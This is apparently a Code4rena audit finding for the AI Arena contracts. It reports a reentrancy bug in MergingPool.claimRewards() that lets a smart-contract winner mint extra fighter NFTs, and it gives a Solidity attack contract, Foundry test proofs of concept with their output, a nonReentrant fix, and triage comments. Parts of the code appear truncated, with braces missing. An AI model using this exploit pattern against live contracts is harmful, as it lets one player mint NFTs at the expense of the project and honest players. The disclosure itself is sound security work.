code-423n4 / 2024-02-ai-arena-findings

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Player can mint more fighter NFTs during claim of rewards by leveraging reentrancy on the `claimRewards() function ` #37

Open c4-bot-10 opened 9 months ago

c4-bot-10 commented 9 months ago

Lines of code

Vulnerability details


When a fighting round ends, winners for the current round get picked and allocated respective rewards. These rewards are fighter NFTs that can be claimed by such winners. When you claim your rewards for a round or several rounds, the numRoundsClaimed state variable which stores the number of rounds you've claimed for gets updated to reflect your claim and each winner can only ever claim up to the amounts they win for each given round. That means if you try to batch-claim for two given rounds for which you won 2 fighter NFTs, your NFT count after the claim should be whatever your current balance of NFT is plus 2 fighter NFTs.

The issue here is that there's a way to mint additional fighter NFTs on top of the fighter NFTs you're owed for winning even though the claimRewards function has implemented a decent system to prevent over-claims. For one, it's relatively complex to spoof a call pretending to be the _mergingPoolAddress to mint but a malicious user doesn't need to worry too much about that to mint more fighters; they just need to leverage using a smart contract for engineering a simple reentrancy.

Proof of Concept

Consider this call path that allows a malicious user to reach this undesired state:

  1. In-session fight round gets finalized.
  2. An admin picks winners for the just finalized round.
  3. Alice, one of the winners is entitled to 2 fighter NFTs just like Bob and decides to claim rewards for the rounds she participated in but keep in mind she joined the game with a smart contract.
  4. Alice calls claimRewards supplying the args (string[] calldata modelURIs, string[] calldata modelTypes, uint256[2][] calldata customAttributes)
  5. Those are valid arguments, hence the loop proceeds to make 2 NFT mints to her address.
  6. Her address, being a smart contract manages to reenter the call to mint additional NFTs.
  7. Alice ends up with more fighter NFTs instead of 2. Bob, who is an EOA gets the 2 NFTs he's owed but Alice has managed to gain more.

The root cause of this issue stems from the roundId. The amount of times you can reenter the claimRewards function depends on the roundId. So let's say the roundId is 3, it mints 6 NFTs:

Here's a POC to show one such attack path in the code Place the code in the MergingPool.t.sol test contract and do the setup: testReenterPOC is the attack POC test

Attack contract:

import "@openzeppelin/contracts/token/ERC721/IERC721Receiver.sol";
contract Attack is IERC721Receiver {

    address owner;
    uint256 tickets = 0;
    MergingPool mergingPool;
    FighterFarm fighterFarm;

    constructor(address mergingPool_, address fighterFarm_) {
        mergingPool = MergingPool(mergingPool_);
        fighterFarm = FighterFarm(fighterFarm_);
        owner = msg.sender;
    function reenter() internal {
        if (tickets < 100) {
            (string[] memory _modelURIs, string[] memory _modelTypes, uint256[2][] memory _customAttributes) = setInformation();
            mergingPool.claimRewards(_modelURIs, _modelTypes, _customAttributes);

    function onERC721Received(address, address, uint256 tokenId, bytes calldata) public returns (bytes4) {
        return IERC721Receiver.onERC721Received.selector;
    function attack() public {
        (string[] memory _modelURIs, string[] memory _modelTypes, uint256[2][] memory _customAttributes) = setInformation();
        mergingPool.claimRewards(_modelURIs, _modelTypes, _customAttributes);

    function setInformation() public pure returns (string[] memory, string[] memory, uint256[2][] memory) {
        string[] memory _modelURIs = new string[](3);
        _modelURIs[0] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        _modelURIs[1] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        _modelURIs[2] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        string[] memory _modelTypes = new string[](3);
        _modelTypes[0] = "original";
        _modelTypes[1] = "original";
        _modelTypes[2] = "original";
        uint256[2][] memory _customAttributes = new uint256[2][](3);
        _customAttributes[0][0] = uint256(1);
        _customAttributes[0][1] = uint256(80);
        _customAttributes[1][0] = uint256(1);
        _customAttributes[1][1] = uint256(80);
        _customAttributes[2][0] = uint256(1);
        _customAttributes[2][1] = uint256(80);

        return (_modelURIs, _modelTypes, _customAttributes);
    function testReenterPOC() public {

        address Bob = makeAddr("Bob");
        Attack attacker = new Attack(address(_mergingPoolContract), address(_fighterFarmContract));


        assertEq(_fighterFarmContract.ownerOf(0), address(attacker));
        assertEq(_fighterFarmContract.ownerOf(1), Bob);

        uint256[] memory _winners = new uint256[](2);
        _winners[0] = 0;
        _winners[1] = 1;

         // winners of roundId 0 are picked
        assertEq(_mergingPoolContract.isSelectionComplete(0), true);  
        assertEq(_mergingPoolContract.winnerAddresses(0, 0) == address(attacker), true);
        // winner matches ownerOf tokenId
        assertEq(_mergingPoolContract.winnerAddresses(0, 1) == Bob, true);

        string[] memory _modelURIs = new string[](2);
        _modelURIs[0] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        _modelURIs[1] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";

        string[] memory _modelTypes = new string[](2);
        _modelTypes[0] = "original";
        _modelTypes[1] = "original";
        uint256[2][] memory _customAttributes = new uint256[2][](2);
        _customAttributes[0][0] = uint256(1);
        _customAttributes[0][1] = uint256(80);
        _customAttributes[1][0] = uint256(1);
        _customAttributes[1][1] = uint256(80);
        // winners of roundId 1 are picked

        uint256 numberOfRounds = _mergingPoolContract.roundId();
        console.log("Number of Rounds: ", numberOfRounds);



        console.log("Balance of attacker (Alice) address pre-claim rewards: ", _fighterFarmContract.balanceOf(address(attacker)));
        // console.log("Balance of Bob address pre-claim rewards: ", _fighterFarmContract.balanceOf(Bob));

        uint256 numRewardsForAttacker = _mergingPoolContract.getUnclaimedRewards(address(attacker));

        // uint256 numRewardsForBob = _mergingPoolContract.getUnclaimedRewards(Bob);


        console.log("Number of unclaimed rewards attacker (Alice) address has a claim to: ", numRewardsForAttacker);
        // console.log("Number of unclaimed rewards Bob address has a claim to: ", numRewardsForBob);

        // vm.prank(Bob);
        // _mergingPoolContract.claimRewards(_modelURIs, _modelTypes, _customAttributes);


        uint256 balanceOfAttackerPostClaim = _fighterFarmContract.balanceOf(address(attacker));

        console.log("Balance of attacker (Alice) address post-claim rewards: ", balanceOfAttackerPostClaim);
        // console.log("Balance of Bob address post-claim rewards: ", _fighterFarmContract.balanceOf(Bob));


Malicious user leveraging reentrancy test result:

[PASS] testReenterPOC() (gas: 3999505)
  Number of Rounds:  1
  Balance of attacker (Alice) address pre-claim rewards:  1
  Number of unclaimed rewards attacker (Alice) address has a claim to:  3
  Balance of attacker (Alice) address post-claim rewards:  7

Non-malicious users test POC:

function testNormalEOAClaim() public {

        assertEq(_fighterFarmContract.ownerOf(0), _ownerAddress);
        assertEq(_fighterFarmContract.ownerOf(1), _DELEGATED_ADDRESS);

        uint256[] memory _winners = new uint256[](2);
        _winners[0] = 0;
        _winners[1] = 1;

        // winners of roundId 0 are picked
        assertEq(_mergingPoolContract.isSelectionComplete(0), true);
        assertEq(_mergingPoolContract.winnerAddresses(0, 0) == _ownerAddress, true);
        // winner matches ownerOf tokenId
        assertEq(_mergingPoolContract.winnerAddresses(0, 1) == _DELEGATED_ADDRESS, true);

        string[] memory _modelURIs = new string[](2);
        _modelURIs[0] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        _modelURIs[1] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";

        string[] memory _modelTypes = new string[](2);
        _modelTypes[0] = "original";
        _modelTypes[1] = "original";
        uint256[2][] memory _customAttributes = new uint256[2][](2);
        _customAttributes[0][0] = uint256(1);
        _customAttributes[0][1] = uint256(80);
        _customAttributes[1][0] = uint256(1);
        _customAttributes[1][1] = uint256(80);
        // winners of roundId 1 are picked

        uint256 numberOfRounds = _mergingPoolContract.roundId();
        console.log("Number of Rounds: ", numberOfRounds);


        console.log("Balance of owner address pre-claim rewards: ", _fighterFarmContract.balanceOf(address(this)));
        console.log("Balance of delegated address pre-claim rewards: ", _fighterFarmContract.balanceOf(_DELEGATED_ADDRESS));

        uint256 numRewardsForWinner = _mergingPoolContract.getUnclaimedRewards(_ownerAddress);

        uint256 numRewardsForDelegated = _mergingPoolContract.getUnclaimedRewards(_DELEGATED_ADDRESS);
        // emit log_uint(numRewardsForWinner);

        console.log("Number of unclaimed rewards owner address has a claim to: ", numRewardsForWinner);
        console.log("Number of unclaimed rewards delegated address has a claim to: ", numRewardsForDelegated);

        // winner claims rewards for previous roundIds
        _mergingPoolContract.claimRewards(_modelURIs, _modelTypes, _customAttributes);
        _mergingPoolContract.claimRewards(_modelURIs, _modelTypes, _customAttributes);

        console.log("Balance of owner address post-claim rewards: ", _fighterFarmContract.balanceOf(address(this)));
        console.log("Balance of delegated address post-claim rewards: ", _fighterFarmContract.balanceOf(_DELEGATED_ADDRESS));

Non-malicious users doing a normal claim result:

[PASS] testNormalEOAClaim() (gas: 2673123)
  Number of Rounds:  1
  Balance of owner address pre-claim rewards:  1
  Balance of delegated address pre-claim rewards:  1
  Number of unclaimed rewards owner address has a claim to:  2
  Number of unclaimed rewards delegated address has a claim to:  2
  Balance of owner address post-claim rewards:  3
  Balance of delegated address post-claim rewards:  3

Tools Used

Manual review

Recommended Mitigation Steps

Use a nonReentrant modifier for the claimRewards function.

Assessed type


c4-pre-sort commented 9 months ago

raymondfam marked the issue as sufficient quality report

c4-pre-sort commented 9 months ago

raymondfam marked the issue as primary issue

raymondfam commented 9 months ago

Seems unlikely because numRoundsClaimed[msg.sender] has been incremented when reentering. lowerBound and currentRound are going to be incremented too. But the POC seems successful.

c4-sponsor commented 9 months ago

brandinho (sponsor) confirmed

c4-judge commented 8 months ago

HickupHH3 marked the issue as selected for report

c4-judge commented 8 months ago

HickupHH3 marked the issue as satisfactory

SonnyCastro commented 8 months ago

Mitigated here